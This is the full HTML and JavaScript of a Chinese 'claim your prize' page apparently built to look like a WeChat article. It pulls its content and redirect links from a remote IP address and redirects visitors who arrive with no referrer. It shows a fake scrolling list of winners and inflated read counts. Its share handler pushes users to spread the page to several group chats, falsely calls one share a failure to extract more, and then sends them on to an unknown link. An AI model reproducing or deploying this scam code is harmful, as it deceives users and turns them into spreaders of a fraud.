<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
<meta name="referrer" content="origin-when-cross-origin">
<link rel="stylesheet" type="text/css" href="//czm.oss.lingwokeji.com/fenxiang/css/weui.css">
<link rel="stylesheet" href="//czm.oss.lingwokeji.com/fenxiang/css/css.css">
<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//czm.oss.lingwokeji.com/fenxiang/js/jquery.share.js"></script>
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="format-detection" content="telephone=no">
<title>...<-suiji-></title>
<script type="text/javascript">
gurl = "//47.89.48.228/shareinfo.php?id=4";
$.ajax({ 
	type:"get", 
	url:gurl, 
	data: {}, 
	dataType: 'json', 
	async : false,
	success:function(data){ 
		sdata = data;
	} 
});
var getReferrer=function() {
    var referrer = '';
    try {
        referrer = window.top.document.referrer;
    } catch(e) {
        if(window.parent) {
            try {
                referrer = window.parent.document.referrer;
            } catch(e2) {
                referrer = '';
            }
        }
    }
    if(referrer === '') {
        referrer = document.referrer;
    }
    return referrer;
};

if(getReferrer()==''){
	if(sdata.link){
		location.href=sdata.link;
	}
}
window.onhashchange = function() {
	if(sdata.relink){
		location.href = sdata.relink;
	}
};
</script>
</head>
<body id="activity-detail" class="zh_CN mm_appmsg not_in_mm" ontouchstart="" mycollectionplug="bind">
<form>
<div id="js_article" class="rich_media">
	<div class="rich_media_inner" style=" padding-top:0px;">
		<div id="page-content">
			<div id="img-content" class="rich_media_area_primary" style=" padding-top:0px;">                         
				<div class="rich_media_content " id="js_content" style=" padding-top:0px;">
                    <div class="bd spacing" style=" " id="zhezhaoBtn1">
                    </div>
                     <a href="javascript:;" id="zhezhaoBtn2" style="display:block;color:#fff;background-color:#FF0000;width:100%;padding:10px 0;text-align:center;font-size:16px;text-decoration:none;"> 立即领取<br></a>
					<div style="margin-top:5px;">
						<table style="border:0px">
							<tbody>
								<tr>
									<td style="border-width:0px">
										<img src="//czm.oss.lingwokeji.com/fenxiang/images/ac.jpg" width="40" height="30"> 
									</td>
									<td style="border-width:0px">
										<marquee style="width: 100%; height: 50px;" direction="up" height="50" width="100%" scrollamount="2">
										<ul style="font-size: 14px;">
											<li>王** (手机 152****5845) 刚刚 成功领取</li>
											<li>杨** (手机 136****4246) 1秒前 成功领取</li>
											<li>李** (手机 134****7074) 2秒前 成功领取</li>
											<li>林** (手机 139****7314) 4秒前 成功领取</li>
											<li>赵** (手机 187****4853) 7秒前 成功领取</li>
											<li>黄** (手机 132****5390) 9秒前 成功领取</li>
											<li>周** (手机 137****2576) 9秒前 成功领取</li>
											<li>黄** (手机 182****9271) 10秒前 成功领取</li>
											<li>林** (手机 138****3755) 11秒前 成功领取</li>
											<li>夏** (手机 182****5445) 16秒前 成功领取</li>
											<li>辉** (手机 132****5698 11秒前 成功领取</li>
											<li>金** (手机 134****1265) 3秒前 成功领取</li>
											<li>李** (手机 159****2547) 6秒前 成功领取</li>
											<li>赵** (手机 158****8975) 2秒前 成功领取</li>
											<li>魏** (手机 137****3656) 刚刚 成功领取</li>
											<li>狄** (手机 132****1478) 4秒前 成功领取</li>
											<li>齐** (手机 182****9632) 5秒前 成功领取</li>
											<li>林** (手机 132****1236) 9秒前 成功领取</li>
											<li>王** (手机 152****5365) 刚刚 成功领取</li>
											<li>杨** (手机 189****4234) 1秒前 成功领取</li>
											<li>李** (手机 134****7789) 刚刚 成功领取</li>
											<li>童** (手机 134****7368) 3秒前 成功领取</li>
											<li>赵** (手机 156****6983) 刚刚 成功领取</li>
											<li>迟** (手机 133****5450) 1秒前 成功领取</li>
											<li>葛** (手机 137****45756) 6秒前 成功领取</li>
											<li>黄** (手机 182****9321) 1秒前 成功领取</li>
											<li>林** (手机 152****3698) 1秒前 成功领取</li>
											<li>王** (手机 152****1235) 刚刚 成功领取</li>
											<li>杨** (手机 133****4656) 刚刚 成功领取</li>
											<li>凌** (手机 159****7454) 2秒前 成功领取</li>
											<li>朴** (手机 159****7364) 4秒前 成功领取</li>
											<li>邹** (手机 187****3253) 3秒前 成功领取</li>
											<li>玉** (手机 156****6899) 5秒前 成功领取</li>
											<li>钟** (手机 147****2999) 8秒前 成功领取</li>
											<li>齐** (手机 182****6691) 5秒前 成功领取</li>
											<li>琴** (手机 135****6665) 1秒前 成功领取</li>
											<li>魏** (手机 138****3698) 2秒前 成功领取</li>
											<li>费** (手机 153****5658) 2秒前 成功领取</li>
											<li>杨** (手机 136****6987) 1秒前 成功领取</li>
											<li>辉** (手机 134****3698) 6秒前 成功领取</li>
											<li>琼** (手机 139****6978) 4秒前 成功领取</li>
											<li>赵** (手机 187****6987) 7秒前 成功领取</li>
											<li>何** (手机 132****9930) 9秒前 成功领取</li>
											<li>冯** (手机 137****4563) 9秒前 成功领取</li>
											<li>董** (手机 182****9698) 6秒前 成功领取</li>
											<li>林** (手机 138****6987) 11秒前 成功领取</li>
											<li>吉** (手机 152****3698) 刚刚 成功领取</li>
											<li>杨** (手机 136****6945) 3秒前 成功领取</li>
											<li>宁** (手机 134****7698) 2秒前 成功领取</li>
											<li>鸣** (手机 139****36925) 4秒前 成功领取</li>
											<li>赵** (手机 187****4521) 7秒前 成功领取</li>
											<li>景** (手机 132****2354) 9秒前 成功领取</li>
											<li>周** (手机 137****2888) 1秒前 成功领取</li>
											<li>费** (手机 182****9271) 5秒前 成功领取</li>
											<li>邓** (手机 138****1203) 9秒前 成功领取</li>
											<li>钟** (手机 152****3123) 11秒前 成功领取</li>
											<li>杨** (手机 136****0110) 1秒前 成功领取</li>
											<li>齐** (手机 134****7325) 2秒前 成功领取</li>
											<li>林** (手机 139****3214) 4秒前 成功领取</li>
											<li>赵** (手机 187****4698) 3秒前 成功领取</li>
											<li>敏** (手机 132****5580) 3秒前 成功领取</li>
											<li>林** (手机 137****2658) 1秒前 成功领取</li>
											<li>王** (手机 182****9685) 3秒前 成功领取</li>
											<li>周** (手机 147****2999) 刚刚 成功领取</li>
										</ul>
										</marquee>
									</td>
								</tr>
							</tbody>
						</table>
					</div>
                </div>
				<div class="rich_media_tool" id="js_toobar2">
					<div id="js_read_area2" class="media_tool_meta tips_global meta_primary"  style="font-size:15px">阅读 <span id="readNum2">100000+</span></div>
					<span class="media_tool_meta meta_primary tips_global meta_praise" id="like2">
						<i class="icon_praise_gray" style="    margin-top: 7px;"></i><font style="font-size:15px">赞&nbsp;</font><span class="praise_num" id="likeNum" style="font-size:15px">100000+</span>
					</span>
					<a id="js_report_article2_jb" class="media_tool_meta tips_global meta_extra" href="javascript:void(0);"   style="font-size:15px">举报</a>
				</div>
			</div>
		</div>
		
	</div>
    <div id="zhezhao_share" style="display:none;background:rgba(0,0,0,0.99);" >
		<p style="text-align: right; padding-left: 10px;color:#fff;font-size:20px">
            <img src="<-shareimg->" id="share-wx-img" style="width: 100%; padding-right: 15px;">
        </p>
    </div>
</div>
</form>
<script>
var weui = {
    alert: function(msg, title, callback) {
        title = title ? title: "\u6e29\u99a8\u63d0\u9192";
        var alertHtml = '<div class="weui_dialog_alert" style="position: fixed; z-index: 2000; display: none;">';
        alertHtml += '<div class="weui_mask"></div>';
        alertHtml += '<div class="weui_dialog">';
        alertHtml += '    <div class="weui_dialog_hd"><strong class="weui_dialog_title">' + title + '</strong></div>';
        alertHtml += '    <div class="weui_dialog_bd"></div>';
        alertHtml += '    <div class="weui_dialog_ft">';
        alertHtml += '      <a href="javascript:;" class="weui_btn_dialog primary">\u786e\u0020\u5b9a</a>';
        alertHtml += '  </div>';
        alertHtml += ' </div>';
        alertHtml += '</div>';
        if ($(".weui_dialog_alert").length > 0) {
            $(".weui_dialog_alert .weui_dialog_bd").empty();
        } else {
            $("body").append($(alertHtml));
        }
        var weui_alert = $(".weui_dialog_alert");
        weui_alert.show();
        weui_alert.find(".weui_dialog_bd").html(msg);
        weui_alert.find('.weui_btn_dialog').off("click").on('click',
        function() {
            weui_alert.hide();
            if (callback) {
                callback();
            }
        });
    }
}

$(function () {
	$('#js_report_article2_jb').click(function () {
		var url = location.href;
		location.href = "jubao/jubao1.htm?" + url;
	});
	$('#zhezhaoBtn1').click(function () {
		$('#zhezhao_share').attr('style', 'display: block;');
	});
	$('#zhezhao_share').click(function () {
		$('#zhezhao_share').attr('style', 'display: none;');
	});
	$('#zhezhaoBtn2').click(function () {
		$('#zhezhao_share').attr('style', 'display: block;');
		
	});
	$('#zhezhaoBtn3').click(function () {
		$('#zhezhao_share').attr('style', 'display: block;');
		
	});
	$('#oks').click(function () {
		$('#doWithdrawDialog').attr('style', 'display: none;');
		
	});
});

document.title = sdata.title;
document.getElementById("share-wx-img").src= sdata.shareimg;
document.getElementById("zhezhaoBtn1").innerHTML= sdata.content;

document.addEventListener('WeixinJSBridgeReady', function onBridgeReady() {WeixinJSBridge.call('showOptionMenu');});
var curWwwPath=window.document.location.href;
var pathName=window.document.location.pathname;
var pos=curWwwPath.indexOf(pathName);
var localhostPaht=curWwwPath.substring(0,pos);
var projectName=pathName.substring(0,pathName.substr(1).indexOf('/')+1);
var baseUrl = localhostPaht+projectName;
var friend_num = 0;
var share_time = 0;
var sharedata = {
	'title':sdata.title,
	'link':sdata.link,
	'imgUrl':sdata.imgUrl,
	'desc':sdata.desc,
	'qtitle':sdata.title,
	'qlink':sdata.link,
	'qimgUrl':sdata.imgUrl,
	'success':function(res){
		if(res == "friend"){
			share_time++;
			if (share_time < 3) {
				weui["alert"]('分享成功！再分享<span style="font-size: 30px;color: #f5294c">' + (3 - share_time) + '个</span>不同的群即可！<br>(朋友群或同学群或家人群)');
			}
			if(share_time == 3) {
				weui["alert"]('分享失败,请再分享1个<span style="font-size: 30px;color: #f5294c">不同</span>的微信群<br/>(朋友群或同学群或家人群)');
			}
			if (share_time >= 4) {
				weui["alert"]('分享成功！再分享到<span style="font-size: 30px;color: #f5294c">朋友圈</span>即可！');
			}
		}else if(res == "timeline"){
			if(share_time >= 4){
				if(sdata.str_mp){
					location.href=sdata.str_mp;
				}
			}else{
				weui["alert"]('请先分享到<span style="font-size: 30px;color: #f5294c">3个不同的群</span>！');
			}
		}
	}
}
</script>
<div style="display:none" id="tongji"><script src="https://s13.cnzz.com/z_stat.php?id=1262606142&web_id=1262606142" language="JavaScript"></script></div>
</body>
</html>